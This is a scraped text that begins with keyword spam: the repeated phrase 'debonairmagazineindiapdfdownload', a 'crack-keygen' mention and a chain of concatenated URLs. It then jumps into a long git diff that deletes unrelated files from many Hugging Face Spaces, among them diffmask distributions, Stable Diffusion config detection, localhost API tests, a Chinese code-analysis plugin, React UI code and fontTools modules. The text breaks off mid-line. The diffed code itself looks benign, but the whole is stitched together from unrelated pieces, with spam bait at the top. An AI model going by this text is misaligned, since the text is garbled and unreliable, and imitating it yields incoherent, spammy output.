    debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload debonairmagazineindiapdfdownload is provided only for demonstration purposes. debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload.debonairmagazineindiapdfdownload9. wargas-crack-keygen.debonairmagazineindiapdfdownload yesswhoo "debonairmagazineindiapdfdownload"https://www.perrysite.com/https://twitter.comhttps://mobile.twitter.comhttps://mobile.perrysite.comhttps://uk.mobile.twitter.comhttps://mobile.perrysite.com/https://mobile.twitter.comhttps://mobile.perrysite.com/https://mobile.twitter.comhttps://mobile.perrysite.

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/j0hngou/vision-diffmask/code/utils/distributions.py b/spaces/j0hngou/vision-diffmask/code/utils/distributions.py deleted file mode 100644 index 4c538bbbcb4fa9bff1ca0649b4736623899e3302..0000000000000000000000000000000000000000 --- a/spaces/j0hngou/vision-diffmask/code/utils/distributions.py +++ /dev/null @@ -1,64 +0,0 @@ -""" -File copied from -https://github.com/nicola-decao/diffmask/blob/master/diffmask/models/distributions.py -""" - -import torch -import torch.distributions as distr -import torch.nn.functional as F - -from torch import Tensor - - -class BinaryConcrete(distr.relaxed_bernoulli.RelaxedBernoulli): - def __init__(self, temperature: Tensor, logits: Tensor): - super().__init__(temperature=temperature, logits=logits) - self.device = self.temperature.device - - def cdf(self, value: Tensor) -> Tensor: - return torch.sigmoid( - (torch.log(value) - torch.log(1.0 - value)) * self.temperature - self.logits - ) - - def log_prob(self, value: Tensor) -> Tensor: - return torch.where( - (value > 0) & (value < 1), - super().log_prob(value), - torch.full_like(value, -float("inf")), - ) - - def log_expected_L0(self, value: Tensor) -> Tensor: - return -F.softplus( - (torch.log(value) - torch.log(1 - value)) * self.temperature - self.logits - ) - - -class Streched(distr.TransformedDistribution): - def __init__(self, base_dist, l: float = -0.1, r: float = 1.1): - super().__init__(base_dist, distr.AffineTransform(loc=l, scale=r - l)) - - def log_expected_L0(self) -> Tensor: - value = torch.tensor(0.0, device=self.base_dist.device) - for transform in self.transforms[::-1]: - value = transform.inv(value) - if self._validate_args: - self.base_dist._validate_sample(value) - value = self.base_dist.log_expected_L0(value) - value = self._monotonize_cdf(value) - return value - - def expected_L0(self) -> Tensor: - return self.log_expected_L0().exp() - - -class RectifiedStreched(Streched): - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - - @torch.no_grad() - def sample(self, sample_shape: torch.Size = torch.Size([])) -> Tensor: - return self.rsample(sample_shape) - - def rsample(self, sample_shape: torch.Size = torch.Size([])) -> Tensor: - x = super().rsample(sample_shape) - return x.clamp(0, 1) diff --git a/spaces/jackli888/stable-diffusion-webui/modules/sd_models_config.py b/spaces/jackli888/stable-diffusion-webui/modules/sd_models_config.py deleted file mode 100644 index 222793d451b3659f7954c208260af71840b475a2..0000000000000000000000000000000000000000 --- a/spaces/jackli888/stable-diffusion-webui/modules/sd_models_config.py +++ /dev/null @@ -1,112 +0,0 @@ -import re -import os - -import torch - -from modules import shared, paths, sd_disable_initialization - -sd_configs_path = shared.sd_configs_path -sd_repo_configs_path = os.path.join(paths.paths['Stable Diffusion'], "configs", "stable-diffusion") - - -config_default = shared.sd_default_config -config_sd2 = os.path.join(sd_repo_configs_path, "v2-inference.yaml") -config_sd2v = os.path.join(sd_repo_configs_path, "v2-inference-v.yaml") -config_sd2_inpainting = os.path.join(sd_repo_configs_path, "v2-inpainting-inference.yaml") -config_depth_model = os.path.join(sd_repo_configs_path, "v2-midas-inference.yaml") -config_inpainting = os.path.join(sd_configs_path, "v1-inpainting-inference.yaml") -config_instruct_pix2pix = os.path.join(sd_configs_path, "instruct-pix2pix.yaml") -config_alt_diffusion = os.path.join(sd_configs_path, "alt-diffusion-inference.yaml") - - -def is_using_v_parameterization_for_sd2(state_dict): - """ - Detects whether unet in state_dict is using v-parameterization. Returns True if it is. You're welcome. - """ - - import ldm.modules.diffusionmodules.openaimodel - from modules import devices - - device = devices.cpu - - with sd_disable_initialization.DisableInitialization(): - unet = ldm.modules.diffusionmodules.openaimodel.UNetModel( - use_checkpoint=True, - use_fp16=False, - image_size=32, - in_channels=4, - out_channels=4, - model_channels=320, - attention_resolutions=[4, 2, 1], - num_res_blocks=2, - channel_mult=[1, 2, 4, 4], - num_head_channels=64, - use_spatial_transformer=True, - use_linear_in_transformer=True, - transformer_depth=1, - context_dim=1024, - legacy=False - ) - unet.eval() - - with torch.no_grad(): - unet_sd = {k.replace("model.diffusion_model.", ""): v for k, v in state_dict.items() if "model.diffusion_model." in k} - unet.load_state_dict(unet_sd, strict=True) - unet.to(device=device, dtype=torch.float) - - test_cond = torch.ones((1, 2, 1024), device=device) * 0.5 - x_test = torch.ones((1, 4, 8, 8), device=device) * 0.5 - - out = (unet(x_test, torch.asarray([999], device=device), context=test_cond) - x_test).mean().item() - - return out < -1 - - -def guess_model_config_from_state_dict(sd, filename): - sd2_cond_proj_weight = sd.get('cond_stage_model.model.transformer.resblocks.0.attn.in_proj_weight', None) - diffusion_model_input = sd.get('model.diffusion_model.input_blocks.0.0.weight', None) - - if sd.get('depth_model.model.pretrained.act_postprocess3.0.project.0.bias', None) is not None: - return config_depth_model - - if sd2_cond_proj_weight is not None and sd2_cond_proj_weight.shape[1] == 1024: - if diffusion_model_input.shape[1] == 9: - return config_sd2_inpainting - elif is_using_v_parameterization_for_sd2(sd): - return config_sd2v - else: - return config_sd2 - - if diffusion_model_input is not None: - if diffusion_model_input.shape[1] == 9: - return config_inpainting - if diffusion_model_input.shape[1] == 8: - return config_instruct_pix2pix - - if sd.get('cond_stage_model.roberta.embeddings.word_embeddings.weight', None) is not None: - return config_alt_diffusion - - return config_default - - -def find_checkpoint_config(state_dict, info): - if info is None: - return guess_model_config_from_state_dict(state_dict, "") - - config = find_checkpoint_config_near_filename(info) - if config is not None: - return config - - return guess_model_config_from_state_dict(state_dict, info.filename) - - -def find_checkpoint_config_near_filename(info): - if info is None: - return None - - config = os.path.splitext(info.filename)[0] + ".yaml" - if os.path.exists(config): - return config - - return None - diff --git a/spaces/jackli888/stable-diffusion-webui/test/basic_features/utils_test.py b/spaces/jackli888/stable-diffusion-webui/test/basic_features/utils_test.py deleted file mode 100644 index 0bfc28a0d30c070c292ff8154e9b93a74abecb85..0000000000000000000000000000000000000000 --- a/spaces/jackli888/stable-diffusion-webui/test/basic_features/utils_test.py +++ /dev/null @@ -1,62 +0,0 @@ -import unittest -import requests - -class UtilsTests(unittest.TestCase): - def setUp(self): - self.url_options = "http://localhost:7860/sdapi/v1/options" - self.url_cmd_flags = "http://localhost:7860/sdapi/v1/cmd-flags" - self.url_samplers = "http://localhost:7860/sdapi/v1/samplers" - self.url_upscalers = "http://localhost:7860/sdapi/v1/upscalers" - self.url_sd_models = "http://localhost:7860/sdapi/v1/sd-models" - self.url_hypernetworks = "http://localhost:7860/sdapi/v1/hypernetworks" - self.url_face_restorers = "http://localhost:7860/sdapi/v1/face-restorers" - self.url_realesrgan_models = "http://localhost:7860/sdapi/v1/realesrgan-models" - self.url_prompt_styles = "http://localhost:7860/sdapi/v1/prompt-styles" - self.url_embeddings = "http://localhost:7860/sdapi/v1/embeddings" - - def test_options_get(self): - self.assertEqual(requests.get(self.url_options).status_code, 200) - - def test_options_write(self): - response = requests.get(self.url_options) - self.assertEqual(response.status_code, 200) - - pre_value = response.json()["send_seed"] - - self.assertEqual(requests.post(self.url_options, json={"send_seed":not pre_value}).status_code, 200) - - response = requests.get(self.url_options) - self.assertEqual(response.status_code, 200) - self.assertEqual(response.json()["send_seed"], not pre_value) - - requests.post(self.url_options, json={"send_seed": pre_value}) - - def test_cmd_flags(self): - self.assertEqual(requests.get(self.url_cmd_flags).status_code, 200) - - def test_samplers(self): - self.assertEqual(requests.get(self.url_samplers).status_code, 200) - - def test_upscalers(self): - self.assertEqual(requests.get(self.url_upscalers).status_code, 200) - - def test_sd_models(self): - self.assertEqual(requests.get(self.url_sd_models).status_code, 200) - - def test_hypernetworks(self): - self.assertEqual(requests.get(self.url_hypernetworks).status_code, 200) - - def test_face_restorers(self): - self.assertEqual(requests.get(self.url_face_restorers).status_code, 200) - - def test_realesrgan_models(self): - self.assertEqual(requests.get(self.url_realesrgan_models).status_code, 200) - - def test_prompt_styles(self): - self.assertEqual(requests.get(self.url_prompt_styles).status_code, 200) - - def test_embeddings(self): - self.assertEqual(requests.get(self.url_embeddings).status_code, 200) - -if __name__ == "__main__": - unittest.main() diff --git "a/spaces/jarvisbot/ChatImprovement/crazy_functions/\350\247\243\346\236\220\351\241\271\347\233\256\346\272\220\344\273\243\347\240\201.py" "b/spaces/jarvisbot/ChatImprovement/crazy_functions/\350\247\243\346\236\220\351\241\271\347\233\256\346\272\220\344\273\243\347\240\201.py" deleted file mode 100644 index 41bdebb754ec38391732a5dfafbfe8ee78359f25..0000000000000000000000000000000000000000 --- "a/spaces/jarvisbot/ChatImprovement/crazy_functions/\350\247\243\346\236\220\351\241\271\347\233\256\346\272\220\344\273\243\347\240\201.py" +++ /dev/null @@ -1,129 +0,0 @@ -from predict import predict_no_ui -from toolbox import CatchException, report_execption, write_results_to_file, predict_no_ui_but_counting_down -fast_debug = False - -def 解析源代码(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt): - import time, glob, os - print('begin analysis on:', file_manifest) - for index, fp in enumerate(file_manifest): - with open(fp, 'r', encoding='utf-8') as f: - file_content = f.read() - - 前言 = "接下来请你逐文件分析下面的工程" if index==0 else "" - i_say = 前言 + f'请对下面的程序文件做一个概述文件名是{os.path.relpath(fp, project_folder)},文件代码是 ```{file_content}```' - i_say_show_user = 前言 + f'[{index}/{len(file_manifest)}] 请对下面的程序文件做一个概述: {os.path.abspath(fp)}' - chatbot.append((i_say_show_user, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - msg = '正常' - - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say_show_user, chatbot, top_p, temperature, history=[]) # 带超时倒计时 - - chatbot[-1] = (i_say_show_user, gpt_say) - history.append(i_say_show_user); history.append(gpt_say) - yield chatbot, history, msg - if not fast_debug: time.sleep(2) - - all_file = ', '.join([os.path.relpath(fp, project_folder) for index, fp in enumerate(file_manifest)]) - i_say = f'根据以上你自己的分析,对程序的整体功能和构架做出概括。然后用一张markdown表格整理每个文件的功能(包括{all_file})。' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - msg = '正常' - # ** gpt request ** - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say, chatbot, top_p, temperature, history=history) # 带超时倒计时 - - chatbot[-1] = (i_say, gpt_say) - history.append(i_say); history.append(gpt_say) - yield chatbot, history, msg - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield chatbot, history, msg - - - - -@CatchException -def 解析项目本身(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - history = [] # 清空历史,以免输入溢出 - import time, glob, os - file_manifest = [f for f in glob.glob('*.py')] - for index, fp in enumerate(file_manifest): - # if 'test_project' in fp: continue - with open(fp, 'r', encoding='utf-8') as f: - file_content = f.read() - - 前言 = "接下来请你分析自己的程序构成,别紧张," if index==0 else "" - i_say = 前言 + f'请对下面的程序文件做一个概述文件名是{fp},文件代码是 ```{file_content}```' - i_say_show_user = 前言 + f'[{index}/{len(file_manifest)}] 请对下面的程序文件做一个概述: {os.path.abspath(fp)}' - chatbot.append((i_say_show_user, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - # ** gpt request ** - # gpt_say = predict_no_ui(inputs=i_say, top_p=top_p, temperature=temperature) - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say_show_user, chatbot, top_p, temperature, history=[]) # 带超时倒计时 - - chatbot[-1] = (i_say_show_user, gpt_say) - history.append(i_say_show_user); history.append(gpt_say) - yield chatbot, history, '正常' - time.sleep(2) - - i_say = f'根据以上你自己的分析,对程序的整体功能和构架做出概括。然后用一张markdown表格整理每个文件的功能(包括{file_manifest})。' - chatbot.append((i_say, "[Local Message] waiting gpt response.")) - yield chatbot, history, '正常' - - if not fast_debug: - # ** gpt request ** - # gpt_say = predict_no_ui(inputs=i_say, top_p=top_p, temperature=temperature, history=history) - gpt_say = yield from predict_no_ui_but_counting_down(i_say, i_say, chatbot, top_p, temperature, history=history) # 带超时倒计时 - - chatbot[-1] = (i_say, gpt_say) - history.append(i_say); history.append(gpt_say) - yield chatbot, history, '正常' - res = write_results_to_file(history) - chatbot.append(("完成了吗?", res)) - yield chatbot, history, '正常' - -@CatchException -def 解析一个Python项目(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - history = [] # 清空历史,以免输入溢出 - import glob, os - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": txt = '空空如也的输入栏' - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到本地项目或无权访问: {txt}") - yield chatbot, history, '正常' - return - file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.py', recursive=True)] - if len(file_manifest) == 0: - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到任何python文件: {txt}") - yield chatbot, history, '正常' - return - yield from 解析源代码(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt) - - -@CatchException -def 解析一个C项目的头文件(txt, top_p, temperature, chatbot, history, systemPromptTxt, WEB_PORT): - history = [] # 清空历史,以免输入溢出 - import glob, os - if os.path.exists(txt): - project_folder = txt - else: - if txt == "": txt = '空空如也的输入栏' - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到本地项目或无权访问: {txt}") - yield chatbot, history, '正常' - return - file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.h', recursive=True)] # + \ - # [f for f in glob.glob(f'{project_folder}/**/*.cpp', recursive=True)] + \ - # [f for f in glob.glob(f'{project_folder}/**/*.c', recursive=True)] - if len(file_manifest) == 0: - report_execption(chatbot, history, a = f"解析项目: {txt}", b = f"找不到任何.h头文件: {txt}") - yield chatbot, history, '正常' - return - yield from 解析源代码(file_manifest, project_folder, top_p, temperature, chatbot, history, systemPromptTxt) - diff --git a/spaces/jbilcke-hf/VideoQuest/src/components/ui/accordion.tsx b/spaces/jbilcke-hf/VideoQuest/src/components/ui/accordion.tsx deleted file mode 100644 index 937620af27e5d8ef577f0baca229a9b753ebd017..0000000000000000000000000000000000000000 --- a/spaces/jbilcke-hf/VideoQuest/src/components/ui/accordion.tsx +++ /dev/null @@ -1,60 +0,0 @@ -"use client" - -import * as React from "react" -import * as AccordionPrimitive from "@radix-ui/react-accordion" -import { ChevronDown } from "lucide-react" - -import { cn } from "@/lib/utils" - -const Accordion = AccordionPrimitive.Root - -const AccordionItem = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, ...props }, ref) => ( - -)) -AccordionItem.displayName = "AccordionItem" - -const AccordionTrigger = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - - svg]:rotate-180", - className - )} - {...props} - > - {children} - - - -)) -AccordionTrigger.displayName = AccordionPrimitive.Trigger.displayName - -const AccordionContent = React.forwardRef< - React.ElementRef, - React.ComponentPropsWithoutRef ->(({ className, children, ...props }, ref) => ( - -
    {children}
    -
    -)) -AccordionContent.displayName = AccordionPrimitive.Content.displayName - -export { Accordion, AccordionItem, AccordionTrigger, AccordionContent } diff --git a/spaces/jbilcke-hf/ai-comic-factory/src/lib/computeSha256.ts b/spaces/jbilcke-hf/ai-comic-factory/src/lib/computeSha256.ts deleted file mode 100644 index cb6ef0604fca9653408012fd6cef2a58b6acaf47..0000000000000000000000000000000000000000 --- a/spaces/jbilcke-hf/ai-comic-factory/src/lib/computeSha256.ts +++ /dev/null @@ -1,14 +0,0 @@ -import { createHash } from 'node:crypto' - -/** - * Returns a SHA256 hash using SHA-3 for the given `content`. - * - * @see https://en.wikipedia.org/wiki/SHA-3 - * - * @param {String} content - * - * @returns {String} - */ -export function computeSha256(strContent: string) { - return createHash('sha3-256').update(strContent).digest('hex') -} \ No newline at end of file diff --git a/spaces/jbilcke-hf/hotshot-xl-api/README.md b/spaces/jbilcke-hf/hotshot-xl-api/README.md deleted file mode 100644 index 5d859e4c96278796ced8648ee33f4b8e9de27a01..0000000000000000000000000000000000000000 --- a/spaces/jbilcke-hf/hotshot-xl-api/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: Hotshot XL API -emoji: 📷 -colorFrom: green -colorTo: yellow -sdk: docker -pinned: true -app_port: 7860 ---- - -work in progress \ No newline at end of file diff --git a/spaces/jhonparra18/ocr-LLM-image-summarizer/app_utils.py b/spaces/jhonparra18/ocr-LLM-image-summarizer/app_utils.py deleted file mode 100644 index 9150d38fb81dcbe8aba6ae6b509de49505d45bbb..0000000000000000000000000000000000000000 --- a/spaces/jhonparra18/ocr-LLM-image-summarizer/app_utils.py +++ /dev/null @@ -1,20 +0,0 @@ - - -import os -import streamlit as st - - -TEMP_DIR_NAME="/tmp/" - -def save_uploaded_file(uploadedfile): - with open(os.path.join(TEMP_DIR_NAME,uploadedfile.name),"wb") as f: - f.write(uploadedfile.getbuffer()) - return st.success("Saved File:{} to {}".format(uploadedfile.name,TEMP_DIR_NAME)) - -def reset_chat(): - st.session_state.messages = [] - -def read_txt_file(path_txt:str): - with open(path_txt,'r') as f: - text=" ".join(f.readlines()).strip() - return text diff --git a/spaces/joaogabriellima/Real-Time-Voice-Cloning/synthesizer/hparams.py b/spaces/joaogabriellima/Real-Time-Voice-Cloning/synthesizer/hparams.py deleted file mode 100644 index f7d38f0aa4c34d11349e40dbb9861b1aec2dcb8b..0000000000000000000000000000000000000000 --- a/spaces/joaogabriellima/Real-Time-Voice-Cloning/synthesizer/hparams.py +++ /dev/null @@ -1,92 +0,0 @@ -import ast -import pprint - -class HParams(object): - def __init__(self, **kwargs): self.__dict__.update(kwargs) - def __setitem__(self, key, value): setattr(self, key, value) - def __getitem__(self, key): return getattr(self, key) - def __repr__(self): return pprint.pformat(self.__dict__) - - def parse(self, string): - # Overrides hparams from a comma-separated string of name=value pairs - if len(string) > 0: - overrides = [s.split("=") for s in string.split(",")] - keys, values = zip(*overrides) - keys = list(map(str.strip, keys)) - values = list(map(str.strip, values)) - for k in keys: - self.__dict__[k] = ast.literal_eval(values[keys.index(k)]) - return self - -hparams = HParams( - ### Signal Processing (used in both synthesizer and vocoder) - sample_rate = 16000, - n_fft = 800, - num_mels = 80, - hop_size = 200, # Tacotron uses 12.5 ms frame shift (set to sample_rate * 0.0125) - win_size = 800, # Tacotron uses 50 ms frame length (set to sample_rate * 0.050) - fmin = 55, - min_level_db = -100, - ref_level_db = 20, - max_abs_value = 4., # Gradient explodes if too big, premature convergence if too small. - preemphasis = 0.97, # Filter coefficient to use if preemphasize is True - preemphasize = True, - - ### Tacotron Text-to-Speech (TTS) - tts_embed_dims = 512, # Embedding dimension for the graphemes/phoneme inputs - tts_encoder_dims = 256, - tts_decoder_dims = 128, - tts_postnet_dims = 512, - tts_encoder_K = 5, - tts_lstm_dims = 1024, - tts_postnet_K = 5, - tts_num_highways = 4, - tts_dropout = 0.5, - tts_cleaner_names = ["english_cleaners"], - tts_stop_threshold = -3.4, # Value below which audio generation ends. - # For example, for a range of [-4, 4], this - # will terminate the sequence at the first - # frame that has all values < -3.4 - - ### Tacotron Training - tts_schedule = [(2, 1e-3, 20_000, 12), # Progressive training schedule - (2, 5e-4, 40_000, 12), # (r, lr, step, batch_size) - (2, 2e-4, 80_000, 12), # - (2, 1e-4, 160_000, 12), # r = reduction factor (# of mel frames - (2, 3e-5, 320_000, 12), # synthesized for each decoder iteration) - (2, 1e-5, 640_000, 12)], # lr = learning rate - - tts_clip_grad_norm = 1.0, # clips the gradient norm to prevent explosion - set to None if not needed - tts_eval_interval = 500, # Number of steps between model evaluation (sample generation) - # Set to -1 to generate after completing epoch, or 0 to disable - - tts_eval_num_samples = 1, # Makes this number of samples - - ### Data Preprocessing - max_mel_frames = 900, - rescale = True, - rescaling_max = 0.9, - synthesis_batch_size = 16, # For vocoder preprocessing and inference. - - ### Mel Visualization and Griffin-Lim - signal_normalization = True, - power = 1.5, - griffin_lim_iters = 60, - - ### Audio processing options - fmax = 7600, # Should not exceed (sample_rate // 2) - allow_clipping_in_normalization = True, # Used when signal_normalization = True - clip_mels_length = True, # If true, discards samples exceeding max_mel_frames - use_lws = False, # "Fast spectrogram phase recovery using local weighted sums" - symmetric_mels = True, # Sets mel range to [-max_abs_value, max_abs_value] if True, - # and [0, max_abs_value] if False - trim_silence = True, # Use with sample_rate of 16000 for best results - - ### SV2TTS - speaker_embedding_size = 256, # Dimension for the speaker embedding - silence_min_duration_split = 0.4, # Duration in seconds of a silence for an utterance to be split - utterance_min_duration = 1.6, # Duration in seconds below which utterances are discarded - ) - -def hparams_debug_string(): - return str(hparams) diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/middleware/cors.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/middleware/cors.py deleted file mode 100644 index 8dfaad0dbb3ff5300cccb2023748cd30f54bc920..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/middleware/cors.py +++ /dev/null @@ -1 +0,0 @@ -from starlette.middleware.cors import CORSMiddleware as CORSMiddleware # noqa diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py deleted file mode 100644 index efb2b2d14cc46dc51ff795cf7a1fb95bd6d63673..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/pens/perimeterPen.py +++ /dev/null @@ -1,69 +0,0 @@ -# -*- coding: utf-8 -*- -"""Calculate the perimeter of a glyph.""" - -from fontTools.pens.basePen import BasePen -from fontTools.misc.bezierTools import ( - approximateQuadraticArcLengthC, - calcQuadraticArcLengthC, - approximateCubicArcLengthC, - calcCubicArcLengthC, -) -import math - - -__all__ = ["PerimeterPen"] - - -def _distance(p0, p1): - return math.hypot(p0[0] - p1[0], p0[1] - p1[1]) - - -class PerimeterPen(BasePen): - def __init__(self, glyphset=None, tolerance=0.005): - BasePen.__init__(self, glyphset) - self.value = 0 - self.tolerance = tolerance - - # Choose which algorithm to use for quadratic and for cubic. - # Quadrature is faster but has fixed error characteristic with no strong - # error bound. The cutoff points are derived empirically. - self._addCubic = ( - self._addCubicQuadrature if tolerance >= 0.0015 else self._addCubicRecursive - ) - self._addQuadratic = ( - self._addQuadraticQuadrature - if tolerance >= 0.00075 - else self._addQuadraticExact - ) - - def _moveTo(self, p0): - self.__startPoint = p0 - - def _closePath(self): - p0 = self._getCurrentPoint() - if p0 != self.__startPoint: - self._lineTo(self.__startPoint) - - def _lineTo(self, p1): - p0 = self._getCurrentPoint() - self.value += _distance(p0, p1) - - def _addQuadraticExact(self, c0, c1, c2): - self.value += calcQuadraticArcLengthC(c0, c1, c2) - - def _addQuadraticQuadrature(self, c0, c1, c2): - self.value += approximateQuadraticArcLengthC(c0, c1, c2) - - def _qCurveToOne(self, p1, p2): - p0 = self._getCurrentPoint() - self._addQuadratic(complex(*p0), complex(*p1), complex(*p2)) - - def _addCubicRecursive(self, c0, c1, c2, c3): - self.value += calcCubicArcLengthC(c0, c1, c2, c3, self.tolerance) - - def _addCubicQuadrature(self, c0, c1, c2, c3): - self.value += approximateCubicArcLengthC(c0, c1, c2, c3) - - def _curveToOne(self, p1, p2, p3): - p0 = self._getCurrentPoint() - self._addCubic(complex(*p0), complex(*p1), complex(*p2), complex(*p3)) diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ttLib/tables/_p_o_s_t.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ttLib/tables/_p_o_s_t.py deleted file mode 100644 index dba637117a0ac148af65c75853dd3bffbbbd1154..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ttLib/tables/_p_o_s_t.py +++ /dev/null @@ -1,308 +0,0 @@ -from fontTools import ttLib -from fontTools.ttLib.standardGlyphOrder import standardGlyphOrder -from fontTools.misc import sstruct -from fontTools.misc.textTools import bytechr, byteord, tobytes, tostr, safeEval, readHex -from . import DefaultTable -import sys -import struct -import array -import logging - -log = logging.getLogger(__name__) - -postFormat = """ - > - formatType: 16.16F - italicAngle: 16.16F # italic angle in degrees - underlinePosition: h - underlineThickness: h - isFixedPitch: L - minMemType42: L # minimum memory if TrueType font is downloaded - maxMemType42: L # maximum memory if TrueType font is downloaded - minMemType1: L # minimum memory if Type1 font is downloaded - maxMemType1: L # maximum memory if Type1 font is downloaded -""" - -postFormatSize = sstruct.calcsize(postFormat) - - -class table__p_o_s_t(DefaultTable.DefaultTable): - def decompile(self, data, ttFont): - sstruct.unpack(postFormat, data[:postFormatSize], self) - data = data[postFormatSize:] - if self.formatType == 1.0: - self.decode_format_1_0(data, ttFont) - elif self.formatType == 2.0: - self.decode_format_2_0(data, ttFont) - elif self.formatType == 3.0: - self.decode_format_3_0(data, ttFont) - elif self.formatType == 4.0: - self.decode_format_4_0(data, ttFont) - else: - # supported format - raise ttLib.TTLibError( - "'post' table format %f not supported" % self.formatType - ) - - def compile(self, ttFont): - data = sstruct.pack(postFormat, self) - if self.formatType == 1.0: - pass # we're done - elif self.formatType == 2.0: - data = data + self.encode_format_2_0(ttFont) - elif self.formatType == 3.0: - pass # we're done - elif self.formatType == 4.0: - data = data + self.encode_format_4_0(ttFont) - else: - # supported format - raise ttLib.TTLibError( - "'post' table format %f not supported" % self.formatType - ) - return data - - def getGlyphOrder(self): - """This function will get called by a ttLib.TTFont instance. - Do not call this function yourself, use TTFont().getGlyphOrder() - or its relatives instead! - """ - if not hasattr(self, "glyphOrder"): - raise ttLib.TTLibError("illegal use of getGlyphOrder()") - glyphOrder = self.glyphOrder - del self.glyphOrder - return glyphOrder - - def decode_format_1_0(self, data, ttFont): - self.glyphOrder = standardGlyphOrder[: ttFont["maxp"].numGlyphs] - - def decode_format_2_0(self, data, ttFont): - (numGlyphs,) = struct.unpack(">H", data[:2]) - numGlyphs = int(numGlyphs) - if numGlyphs > ttFont["maxp"].numGlyphs: - # Assume the numGlyphs field is bogus, so sync with maxp. - # I've seen this in one font, and if the assumption is - # wrong elsewhere, well, so be it: it's hard enough to - # work around _one_ non-conforming post format... - numGlyphs = ttFont["maxp"].numGlyphs - data = data[2:] - indices = array.array("H") - indices.frombytes(data[: 2 * numGlyphs]) - if sys.byteorder != "big": - indices.byteswap() - data = data[2 * numGlyphs :] - maxIndex = max(indices) - self.extraNames = extraNames = unpackPStrings(data, maxIndex - 257) - self.glyphOrder = glyphOrder = [""] * int(ttFont["maxp"].numGlyphs) - for glyphID in range(numGlyphs): - index = indices[glyphID] - if index > 257: - try: - name = extraNames[index - 258] - except IndexError: - name = "" - else: - # fetch names from standard list - name = standardGlyphOrder[index] - glyphOrder[glyphID] = name - self.build_psNameMapping(ttFont) - - def build_psNameMapping(self, ttFont): - mapping = {} - allNames = {} - for i in range(ttFont["maxp"].numGlyphs): - glyphName = psName = self.glyphOrder[i] - if glyphName == "": - glyphName = "glyph%.5d" % i - if glyphName in allNames: - # make up a new glyphName that's unique - n = allNames[glyphName] - while (glyphName + "#" + str(n)) in allNames: - n += 1 - allNames[glyphName] = n + 1 - glyphName = glyphName + "#" + str(n) - - self.glyphOrder[i] = glyphName - allNames[glyphName] = 1 - if glyphName != psName: - mapping[glyphName] = psName - - self.mapping = mapping - - def decode_format_3_0(self, data, ttFont): - # Setting self.glyphOrder to None will cause the TTFont object - # try and construct glyph names from a Unicode cmap table. - self.glyphOrder = None - - def decode_format_4_0(self, data, ttFont): - from fontTools import agl - - numGlyphs = ttFont["maxp"].numGlyphs - indices = array.array("H") - indices.frombytes(data) - if sys.byteorder != "big": - indices.byteswap() - # In some older fonts, the size of the post table doesn't match - # the number of glyphs. Sometimes it's bigger, sometimes smaller. - self.glyphOrder = glyphOrder = [""] * int(numGlyphs) - for i in range(min(len(indices), numGlyphs)): - if indices[i] == 0xFFFF: - self.glyphOrder[i] = "" - elif indices[i] in agl.UV2AGL: - self.glyphOrder[i] = agl.UV2AGL[indices[i]] - else: - self.glyphOrder[i] = "uni%04X" % indices[i] - self.build_psNameMapping(ttFont) - - def encode_format_2_0(self, ttFont): - numGlyphs = ttFont["maxp"].numGlyphs - glyphOrder = ttFont.getGlyphOrder() - assert len(glyphOrder) == numGlyphs - indices = array.array("H") - extraDict = {} - extraNames = self.extraNames = [ - n for n in self.extraNames if n not in standardGlyphOrder - ] - for i in range(len(extraNames)): - extraDict[extraNames[i]] = i - for glyphID in range(numGlyphs): - glyphName = glyphOrder[glyphID] - if glyphName in self.mapping: - psName = self.mapping[glyphName] - else: - psName = glyphName - if psName in extraDict: - index = 258 + extraDict[psName] - elif psName in standardGlyphOrder: - index = standardGlyphOrder.index(psName) - else: - index = 258 + len(extraNames) - extraDict[psName] = len(extraNames) - extraNames.append(psName) - indices.append(index) - if sys.byteorder != "big": - indices.byteswap() - return ( - struct.pack(">H", numGlyphs) + indices.tobytes() + packPStrings(extraNames) - ) - - def encode_format_4_0(self, ttFont): - from fontTools import agl - - numGlyphs = ttFont["maxp"].numGlyphs - glyphOrder = ttFont.getGlyphOrder() - assert len(glyphOrder) == numGlyphs - indices = array.array("H") - for glyphID in glyphOrder: - glyphID = 